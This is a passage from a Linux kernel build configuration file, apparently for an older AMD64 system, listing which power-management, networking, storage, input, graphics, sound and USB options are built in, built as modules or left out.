CONFIG_HZ_1000=y CONFIG_HZ=1000 # CONFIG_REORDER is not set CONFIG_K8_NB=y CONFIG_GENERIC_HARDIRQS=y CONFIG_GENERIC_IRQ_PROBE=y CONFIG_ISA_DMA_API=y # # Power management options # CONFIG_PM=y CONFIG_PM_LEGACY=y # CONFIG_PM_DEBUG is not set # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y # CONFIG_ACPI_SLEEP_PROC_SLEEP is not set CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_VIDEO=y # CONFIG_ACPI_HOTKEY is not set CONFIG_ACPI_FAN=y # CONFIG_ACPI_DOCK is not set CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_IBM is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_BLACKLIST_YEAR=0 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y # CONFIG_ACPI_CONTAINER is not set # CONFIG_ACPI_SBS is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI etc.) # CONFIG_PCI=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_MMCONFIG is not set CONFIG_PCIEPORTBUS=y # CONFIG_PCI_MSI is not set # CONFIG_PCI_DEBUG is not set # # PCCARD (PCMCIA/CardBus) support # # CONFIG_PCCARD is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats / Emulations # CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_MISC is not set CONFIG_IA32_EMULATION=y CONFIG_IA32_AOUT=m CONFIG_COMPAT=y CONFIG_SYSVIPC_COMPAT=y # # Networking # CONFIG_NET=y # # Networking options # # CONFIG_NETDEBUG is not set CONFIG_PACKET=m # CONFIG_PACKET_MMAP is not set CONFIG_UNIX=m CONFIG_XFRM=y CONFIG_XFRM_USER=m # CONFIG_NET_KEY is not set CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set CONFIG_IP_FIB_HASH=y # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set CONFIG_INET_AH=m CONFIG_INET_ESP=m CONFIG_INET_IPCOMP=m CONFIG_INET_XFRM_TUNNEL=m CONFIG_INET_TUNNEL=m CONFIG_INET_XFRM_MODE_TRANSPORT=y CONFIG_INET_XFRM_MODE_TUNNEL=y CONFIG_INET_DIAG=y CONFIG_INET_TCP_DIAG=y # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_BIC=y # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set # CONFIG_INET6_XFRM_TUNNEL is not set # CONFIG_INET6_TUNNEL is not set # CONFIG_NETWORK_SECMARK is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # Core Netfilter Configuration # CONFIG_NETFILTER_NETLINK=m # CONFIG_NETFILTER_NETLINK_QUEUE is not set # CONFIG_NETFILTER_NETLINK_LOG is not set CONFIG_NETFILTER_XTABLES=m # CONFIG_NETFILTER_XT_TARGET_CLASSIFY is not set # CONFIG_NETFILTER_XT_TARGET_MARK is not set # CONFIG_NETFILTER_XT_TARGET_NFQUEUE is not set # CONFIG_NETFILTER_XT_MATCH_COMMENT is not set # CONFIG_NETFILTER_XT_MATCH_CONNTRACK is not set # CONFIG_NETFILTER_XT_MATCH_DCCP is not set # CONFIG_NETFILTER_XT_MATCH_ESP is not set # CONFIG_NETFILTER_XT_MATCH_HELPER is not set # CONFIG_NETFILTER_XT_MATCH_LENGTH is not set # CONFIG_NETFILTER_XT_MATCH_LIMIT is not set # CONFIG_NETFILTER_XT_MATCH_MAC is not set # CONFIG_NETFILTER_XT_MATCH_MARK is not set # CONFIG_NETFILTER_XT_MATCH_POLICY is not set # CONFIG_NETFILTER_XT_MATCH_MULTIPORT is not set # CONFIG_NETFILTER_XT_MATCH_PKTTYPE is not set # CONFIG_NETFILTER_XT_MATCH_QUOTA is not set # CONFIG_NETFILTER_XT_MATCH_REALM is not set # CONFIG_NETFILTER_XT_MATCH_SCTP is not set # CONFIG_NETFILTER_XT_MATCH_STATE is not set # CONFIG_NETFILTER_XT_MATCH_STATISTIC is not set # CONFIG_NETFILTER_XT_MATCH_STRING is not set # CONFIG_NETFILTER_XT_MATCH_TCPMSS is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m # CONFIG_IP_NF_CT_ACCT is not set # CONFIG_IP_NF_CONNTRACK_MARK is not set # CONFIG_IP_NF_CONNTRACK_EVENTS is not set # CONFIG_IP_NF_CONNTRACK_NETLINK is not set # CONFIG_IP_NF_CT_PROTO_SCTP is not set # CONFIG_IP_NF_FTP is not set # CONFIG_IP_NF_IRC is not set # CONFIG_IP_NF_NETBIOS_NS is not set # CONFIG_IP_NF_TFTP is not set # CONFIG_IP_NF_AMANDA is not set # CONFIG_IP_NF_PPTP is not set # CONFIG_IP_NF_H323 is not set # CONFIG_IP_NF_SIP is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_IPRANGE=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_MATCH_ADDRTYPE=m CONFIG_IP_NF_MATCH_HASHLIMIT=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_LOG=m # CONFIG_IP_NF_TARGET_ULOG is not set # CONFIG_IP_NF_TARGET_TCPMSS is not set # CONFIG_IP_NF_NAT is not set # CONFIG_IP_NF_MANGLE is not set # CONFIG_IP_NF_RAW is not set # CONFIG_IP_NF_ARPTABLES is not set # # DCCP Configuration (EXPERIMENTAL) # # CONFIG_IP_DCCP is not set # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # # TIPC Configuration (EXPERIMENTAL) # # CONFIG_TIPC is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set # CONFIG_IEEE80211 is not set # # Device Drivers # # # Generic Driver Options # CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=m # CONFIG_DEBUG_DRIVER is not set # CONFIG_SYS_HYPERVISOR is not set # # Connector - unified userspace &lt;-&gt; kernelspace linker # # CONFIG_CONNECTOR is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_SERIAL=m CONFIG_PARPORT_PC_FIFO=y # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_GSC is not set # CONFIG_PARPORT_AX88796 is not set CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_PNPACPI=y # # Block devices # CONFIG_BLK_DEV_FD=m # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_UB is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_BLK_DEV_INITRD is not set CONFIG_CDROM_PKTCDVD=y CONFIG_CDROM_PKTCDVD_BUFFERS=8 CONFIG_CDROM_PKTCDVD_WCACHE=y # CONFIG_ATA_OVER_ETH is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y # CONFIG_IDEDISK_MULTI_MODE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set CONFIG_BLK_DEV_IDESCSI=m # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPNP=y CONFIG_BLK_DEV_IDEPCI=y # CONFIG_IDEPCI_SHARE_IRQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set CONFIG_BLK_DEV_AMD74XX=y # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # # CONFIG_RAID_ATTRS is not set CONFIG_SCSI=m CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set # CONFIG_CHR_DEV_SG is not set # CONFIG_CHR_DEV_SCH is not set # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI Transport Attributes # # CONFIG_SCSI_SPI_ATTRS is not set # CONFIG_SCSI_FC_ATTRS is not set # CONFIG_SCSI_ISCSI_ATTRS is not set # CONFIG_SCSI_SAS_ATTRS is not set # # SCSI low-level drivers # # CONFIG_ISCSI_TCP is not set # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_3W_9XXX is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_MEGARAID_NEWGEN is not set # CONFIG_MEGARAID_LEGACY is not set # CONFIG_MEGARAID_SAS is not set # CONFIG_SCSI_SATA is not set # CONFIG_SCSI_HPTIOP is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_IPR is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_QLA_FC is not set # CONFIG_SCSI_LPFC is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # CONFIG_FUSION_SPI is not set # CONFIG_FUSION_FC is not set # CONFIG_FUSION_SAS is not set # # IEEE 1394 (FireWire) support # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Network device support # CONFIG_NETDEVICES=y # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set CONFIG_TUN=m # CONFIG_NET_SB1000 is not set # # ARCnet devices # # CONFIG_ARCNET is not set # # PHY device support # # CONFIG_PHYLIB is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=m # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_CASSINI is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set CONFIG_FORCEDETH=m # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_VIA_RHINE is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SKGE is not set # CONFIG_SKY2 is not set # CONFIG_SK98LIN is not set # CONFIG_VIA_VELOCITY is not set # CONFIG_TIGON3 is not set # CONFIG_BNX2 is not set # # Ethernet (10000 Mbit) # # CONFIG_CHELSIO_T1 is not set # CONFIG_IXGB is not set # CONFIG_S2IO is not set # CONFIG_MYRI10GE is not set # # Token Ring devices # # CONFIG_TR is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=m # CONFIG_PPP_MULTILINK is not set # CONFIG_PPP_FILTER is not set CONFIG_PPP_ASYNC=m # CONFIG_PPP_SYNC_TTY is not set # CONFIG_PPP_DEFLATE is not set # CONFIG_PPP_BSDCOMP is not set # CONFIG_PPP_MPPE is not set # CONFIG_PPPOE is not set # CONFIG_SLIP is not set # CONFIG_NET_FC is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=m # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y CONFIG_INPUT_PCSPKR=m # CONFIG_INPUT_UINPUT is not set # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=m # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set CONFIG_SERIO_PCIPS2=y CONFIG_SERIO_LIBPS2=y # CONFIG_SERIO_RAW is not set # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_VT_HW_CONSOLE_BINDING is not set # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=m CONFIG_SERIAL_8250_PCI=m CONFIG_SERIAL_8250_PNP=m CONFIG_SERIAL_8250_NR_UARTS=4 CONFIG_SERIAL_8250_RUNTIME_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=m # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=16 CONFIG_PRINTER=m CONFIG_LP_CONSOLE=y CONFIG_PPDEV=m # CONFIG_TIPAR is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set CONFIG_HW_RANDOM=y CONFIG_HW_RANDOM_INTEL=y CONFIG_HW_RANDOM_AMD=y CONFIG_HW_RANDOM_GEODE=y CONFIG_NVRAM=m CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y CONFIG_AGP_AMD64=y # CONFIG_AGP_INTEL is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_VIA is not set CONFIG_DRM=m # CONFIG_DRM_TDFX is not set # CONFIG_DRM_R128 is not set CONFIG_DRM_RADEON=m # CONFIG_DRM_MGA is not set # CONFIG_DRM_SIS is not set # CONFIG_DRM_VIA is not set # CONFIG_DRM_SAVAGE is not set # CONFIG_MWAVE is not set # CONFIG_PC8736x_GPIO is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HPET is not set # CONFIG_HANGCHECK_TIMER is not set # # TPM devices # # CONFIG_TCG_TPM is not set # CONFIG_TELCLOCK is not set # # I2C support # CONFIG_I2C=y CONFIG_I2C_CHARDEV=m # # I2C Algorithms # CONFIG_I2C_ALGOBIT=y # CONFIG_I2C_ALGOPCF is not set # CONFIG_I2C_ALGOPCA is not set # # I2C Hardware Bus support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set CONFIG_I2C_AMD756=m # CONFIG_I2C_AMD756_S4882 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_I810 is not set # CONFIG_I2C_PIIX4 is not set CONFIG_I2C_ISA=m CONFIG_I2C_NFORCE2=m # CONFIG_I2C_OCORES is not set # CONFIG_I2C_PARPORT is not set # CONFIG_I2C_PARPORT_LIGHT is not set # CONFIG_I2C_PROSAVAGE is not set # CONFIG_I2C_SAVAGE4 is not set # CONFIG_I2C_SIS5595 is not set # CONFIG_I2C_SIS630 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_STUB is not set # CONFIG_I2C_VIA is not set # CONFIG_I2C_VIAPRO is not set # CONFIG_I2C_VOODOO3 is not set # CONFIG_I2C_PCA_ISA is not set # # Miscellaneous I2C Chip support # # CONFIG_SENSORS_DS1337 is not set # CONFIG_SENSORS_DS1374 is not set CONFIG_SENSORS_EEPROM=m # CONFIG_SENSORS_PCF8574 is not set # CONFIG_SENSORS_PCA9539 is not set # CONFIG_SENSORS_PCF8591 is not set # CONFIG_SENSORS_MAX6875 is not set # CONFIG_I2C_DEBUG_CORE is not set # CONFIG_I2C_DEBUG_ALGO is not set # CONFIG_I2C_DEBUG_BUS is not set # CONFIG_I2C_DEBUG_CHIP is not set # # SPI support # # CONFIG_SPI is not set # CONFIG_SPI_MASTER is not set # # Dallas's 1-wire bus # # # Hardware Monitoring support # CONFIG_HWMON=m CONFIG_HWMON_VID=m # CONFIG_SENSORS_ABITUGURU is not set # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_ADM1025 is not set # CONFIG_SENSORS_ADM1026 is not set # CONFIG_SENSORS_ADM1031 is not set # CONFIG_SENSORS_ADM9240 is not set # CONFIG_SENSORS_ASB100 is not set # CONFIG_SENSORS_ATXP1 is not set # CONFIG_SENSORS_DS1621 is not set # CONFIG_SENSORS_F71805F is not set # CONFIG_SENSORS_FSCHER is not set # CONFIG_SENSORS_FSCPOS is not set # CONFIG_SENSORS_GL518SM is not set # CONFIG_SENSORS_GL520SM is not set CONFIG_SENSORS_IT87=m # CONFIG_SENSORS_LM63 is not set # CONFIG_SENSORS_LM75 is not set # CONFIG_SENSORS_LM77 is not set # CONFIG_SENSORS_LM78 is not set # CONFIG_SENSORS_LM80 is not set # CONFIG_SENSORS_LM83 is not set # CONFIG_SENSORS_LM85 is not set # CONFIG_SENSORS_LM87 is not set CONFIG_SENSORS_LM90=m # CONFIG_SENSORS_LM92 is not set # CONFIG_SENSORS_MAX1619 is not set # CONFIG_SENSORS_PC87360 is not set # CONFIG_SENSORS_SIS5595 is not set # CONFIG_SENSORS_SMSC47M1 is not set # CONFIG_SENSORS_SMSC47M192 is not set # CONFIG_SENSORS_SMSC47B397 is not set # CONFIG_SENSORS_VIA686A is not set # CONFIG_SENSORS_VT8231 is not set # CONFIG_SENSORS_W83781D is not set # CONFIG_SENSORS_W83791D is not set # CONFIG_SENSORS_W83792D is not set # CONFIG_SENSORS_W83L785TS is not set # CONFIG_SENSORS_W83627HF is not set # CONFIG_SENSORS_W83627EHF is not set # CONFIG_SENSORS_HDAPS is not set # CONFIG_HWMON_DEBUG_CHIP is not set # # Misc devices # # CONFIG_IBM_ASM is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set CONFIG_VIDEO_V4L2=y # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # CONFIG_USB_DABUSB is not set # # Graphics support # CONFIG_FIRMWARE_EDID=y CONFIG_FB=y CONFIG_FB_CFB_FILLRECT=y CONFIG_FB_CFB_COPYAREA=y CONFIG_FB_CFB_IMAGEBLIT=y # CONFIG_FB_MACMODES is not set # CONFIG_FB_BACKLIGHT is not set CONFIG_FB_MODE_HELPERS=y # CONFIG_FB_TILEBLITTING is not set # CONFIG_FB_CIRRUS is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_ARC is not set # CONFIG_FB_ASILIANT is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y # CONFIG_FB_HGA is not set # CONFIG_FB_S1D13XXX is not set # CONFIG_FB_NVIDIA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_INTEL is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SAVAGE is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_KYRO is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_GEODE is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_VGACON_SOFT_SCROLLBACK is not set CONFIG_VIDEO_SELECT=y CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y # CONFIG_FRAMEBUFFER_CONSOLE_ROTATION is not set # CONFIG_FONTS is not set CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y # # Logo configuration # CONFIG_LOGO=y # CONFIG_LOGO_LINUX_MONO is not set # CONFIG_LOGO_LINUX_VGA16 is not set CONFIG_LOGO_LINUX_CLUT224=y # CONFIG_BACKLIGHT_LCD_SUPPORT is not set # # Sound # CONFIG_SOUND=m # # Advanced Linux Sound Architecture # CONFIG_SND=m CONFIG_SND_TIMER=m CONFIG_SND_PCM=m CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_PCM_OSS_PLUGINS=y CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_RTCTIMER is not set # CONFIG_SND_DYNAMIC_MINORS is not set CONFIG_SND_SUPPORT_OLD_API=y CONFIG_SND_VERBOSE_PROCFS=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # CONFIG_SND_AC97_CODEC=m CONFIG_SND_AC97_BUS=m # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # # CONFIG_SND_AD1889 is not set # CONFIG_SND_ALS300 is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_ALI5451 is not set # CONFIG_SND_ATIIXP is not set # CONFIG_SND_ATIIXP_MODEM is not set # CONFIG_SND_AU8810 is not set # CONFIG_SND_AU8820 is not set # CONFIG_SND_AU8830 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_BT87X is not set # CONFIG_SND_CA0106 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_DARLA20 is not set # CONFIG_SND_GINA20 is not set # CONFIG_SND_LAYLA20 is not set # CONFIG_SND_DARLA24 is not set # CONFIG_SND_GINA24 is not set # CONFIG_SND_LAYLA24 is not set # CONFIG_SND_MONA is not set # CONFIG_SND_MIA is not set # CONFIG_SND_ECHO3G is not set # CONFIG_SND_INDIGO is not set # CONFIG_SND_INDIGOIO is not set # CONFIG_SND_INDIGODJ is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_EMU10K1X is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_HDA_INTEL is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_HDSPM is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set CONFIG_SND_INTEL8X0=m # CONFIG_SND_INTEL8X0M is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_MIXART is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_PCXHR is not set # CONFIG_SND_RIPTIDE is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VIA82XX_MODEM is not set # CONFIG_SND_VX222 is not set # CONFIG_SND_YMFPCI is not set # # USB devices # # CONFIG_SND_USB_AUDIO is not set # CONFIG_SND_USB_USX2Y is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_ARCH_HAS_OHCI=y CONFIG_USB_ARCH_HAS_EHCI=y CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y CONFIG_USB_BANDWIDTH=y CONFIG_USB_DYNAMIC_MINORS=y # CONFIG_USB_SUSPEND is not set # CONFIG_USB_OTG is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=m # CONFIG_USB_EHCI_SPLIT_ISO is not set # CONFIG_USB_EHCI_ROOT_HUB_TT is not set # CONFIG_USB_EHCI_TT_NEWSCHED is not set # CONFIG_USB_ISP116X_HCD is not set CONFIG_USB_OHCI_HCD=m # CONFIG_USB_OHCI_BIG_ENDIAN is not set CONFIG_USB_OHCI_LITTLE_ENDIAN=y # CONFIG_USB_UHCI_HCD is not set # CONFIG_USB_SL811_HCD is not set # # USB Device Class drivers # # 